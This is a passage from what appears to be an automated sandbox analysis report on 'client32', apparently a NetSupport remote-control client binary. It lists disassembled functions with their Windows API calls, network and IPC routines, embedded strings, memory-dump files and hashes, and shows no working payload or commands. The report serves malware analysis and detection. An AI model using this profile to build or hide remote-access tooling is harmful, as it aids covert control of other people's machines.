                                                                              • SendMessageTimeoutA.USER32(00000000,0000004A,00040270,00000003,00000002,00002710,?), ref: 1113C56F
                                                                              • _free.LIBCMT ref: 1113C576
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLastMessageSendTimeoutWindow_free_malloc_memmove_strncpy
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                              • API String ID: 1602665774-2270926670
                                                                              • Opcode ID: e2abf284167a6e6cb6024ac74b78426798698c9d11ed7799c078f4a418bb9f00
                                                                              • Instruction ID: a2dd537b469b56fd0a393197ec2e6fa62d94d6918f16b8d23f7c7785d4e9094b
                                                                              • Opcode Fuzzy Hash: e2abf284167a6e6cb6024ac74b78426798698c9d11ed7799c078f4a418bb9f00
                                                                              • Instruction Fuzzy Hash: 5D51C134A0120AAFDB00DF94DD81FEEF7B9EF89718F104125F915A7284E771AA04CB91
                                                                              Function 110D8180 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 147networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,AB86ACF8,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 11010CD0: _memmove.LIBCMT ref: 11010D0D
                                                                              • shutdown.WSOCK32(?,00000002,00000000,00000000,00000000), ref: 110D81F9
                                                                              • closesocket.WSOCK32(?), ref: 110D8203
                                                                              • __CxxThrowException@8.LIBCMT ref: 110D8229
                                                                              • _memset.LIBCMT ref: 110D827C
                                                                              • gethostname.WSOCK32(?,00000200,0000005C,00000000,111EE030), ref: 110D8290
                                                                              • gethostbyname.WSOCK32(?), ref: 110D82C1
                                                                              • inet_ntoa.WSOCK32 ref: 110D82EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8SectionThrow_memmove_memsetclosesocketgethostbynamegethostnameinet_ntoashutdown
                                                                              • String ID: 127.0.0.1
                                                                              • API String ID: 3213037012-3619153832
                                                                              • Opcode ID: 0667ac5c8d136c85764237683a7513ac93f65a2d80e195fcd17a6dc8b2304ea0
                                                                              • Instruction ID: aa17ea021d3ed84f241b33fe3108128a88572c75fddb31a861601ff691f486d7
                                                                              • Opcode Fuzzy Hash: 0667ac5c8d136c85764237683a7513ac93f65a2d80e195fcd17a6dc8b2304ea0
                                                                              • Instruction Fuzzy Hash: C651B675D00758AFDB24CFA4C884B9EFBB8EB08714F00466DE45697680DB75AA48CF90
                                                                              Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                              • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                              • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                              • String ID: 8
                                                                              • API String ID: 762489935-4194326291
                                                                              • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                              • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                              • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                              Function 1104C3E3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • PostMessageA.USER32(0000FFFF,0000C1C4,00000000,00000000), ref: 1104C4D9
                                                                              • PostMessageA.USER32(00040270,0000048F,00000032,00000000), ref: 1104C50A
                                                                              • PostMessageA.USER32(00040270,00000483,00000000,00000000), ref: 1104C51C
                                                                              • PostMessageA.USER32(00040270,0000048F,000000C8,00000000), ref: 1104C530
                                                                              • PostMessageA.USER32(00040270,00000483,00000001,?), ref: 1104C547
                                                                              • PostMessageA.USER32(00040270,00000800,00000000,00000000), ref: 1104C558
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePost$__wcstoi64
                                                                              • String ID: Client$UnloadMirrorOnEndView
                                                                              • API String ID: 1802880851-3586292995
                                                                              • Opcode ID: a41bae29c585707371357c8caec9141dff0e8bf7478b157c6d85ab70ef4f8417
                                                                              • Instruction ID: f03e4b2a21c92520a355d730a4440e838d8bebb2f72c7bea427c3ee4d591d5f8
                                                                              • Opcode Fuzzy Hash: a41bae29c585707371357c8caec9141dff0e8bf7478b157c6d85ab70ef4f8417
                                                                              • Instruction Fuzzy Hash: 7641B275A42231ABE315DB90CC81FBAB7A8BB85B18F108569F61557288CB70B940CBD1
                                                                              Function 11148010 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:, xrefs: 1114809D
                                                                              • %02X , xrefs: 111480E2
                                                                              • Callstack:, xrefs: 111480FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$CurrentReadThread
                                                                              • String ID: Callstack:$%02X $EAX=%08X EBX=%08X ECX=%08X EDX=%08X ESI=%08XEDI=%08X EBP=%08X ESP=%08X EIP=%08X FLG=%08XCS=%04X DS=%04X SS=%04X ES=%04X FS=%04X GS=%04X TID=%XEIP:
                                                                              • API String ID: 477357799-160799177
                                                                              • Opcode ID: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                              • Instruction ID: 6f7d134abcf48abb40f6f3b0b22a813e08fdaf2ee64347ae44ec59e5a96c1c79
                                                                              • Opcode Fuzzy Hash: e6fc7ff37065f7da211f907daa642f56825c7247d90f298499add0651c530b71
                                                                              • Instruction Fuzzy Hash: 23410DB1200705AFDB54CFA8DC90F97B7E9BB48608F148918F96DC7644DB30B914CB61
                                                                              Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                              • _memset.LIBCMT ref: 11005240
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2755257978-4108050209
                                                                              • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                              • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                              • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                              Function 11027040 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 94sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                              • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                              • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                              • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                              • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                              • API String ID: 4250438611-314227603
                                                                              • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                              • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                              Function 11009500 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _strncmp.LIBCMT ref: 1100953A
                                                                              • _strncmp.LIBCMT ref: 1100954A
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,AB86ACF8), ref: 110095EB
                                                                              Strings
                                                                              • https://, xrefs: 1100952F
                                                                              • IsA(), xrefs: 110095A5, 110095CD
                                                                              • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                              • http://, xrefs: 11009535, 11009548
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp$FileWrite
                                                                              • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                              • API String ID: 1635020204-3154135529
                                                                              • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                              • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                              Function 11144040 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 91libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111440A6
                                                                              • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 111440B8
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111440F4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 11144111
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Free$AddressErrorExitLastLoadMessageProcProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$DllGetVersion$pdwMajorVer$pdwMinorVer
                                                                              • API String ID: 2160193376-301070788
                                                                              • Opcode ID: e44ab046283bc651aae464860159ad9237f7330829552d468496f3076074b2e2
                                                                              • Instruction ID: 8ec37360b6af12359677f4f789901c443318a14bbc26c3183c6290fe893a0892
                                                                              • Opcode Fuzzy Hash: e44ab046283bc651aae464860159ad9237f7330829552d468496f3076074b2e2
                                                                              • Instruction Fuzzy Hash: 1331D176F0021A9BCB04DFE9D880BEEF7B4EF58759F10006EE919A7B00DB7059008B91
                                                                              Function 1112C1B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 78libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,?,?,?,?,1102E5E1,?,?,11195264,Trying to get mac addr for %u.%u.%u.%u,?,000000FF,?,?), ref: 1112C1D5
                                                                              • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1112C1EE
                                                                              • wsprintfA.USER32 ref: 1112C23B
                                                                              • wsprintfA.USER32 ref: 1112C253
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,1102E5E1), ref: 1112C268
                                                                              Strings
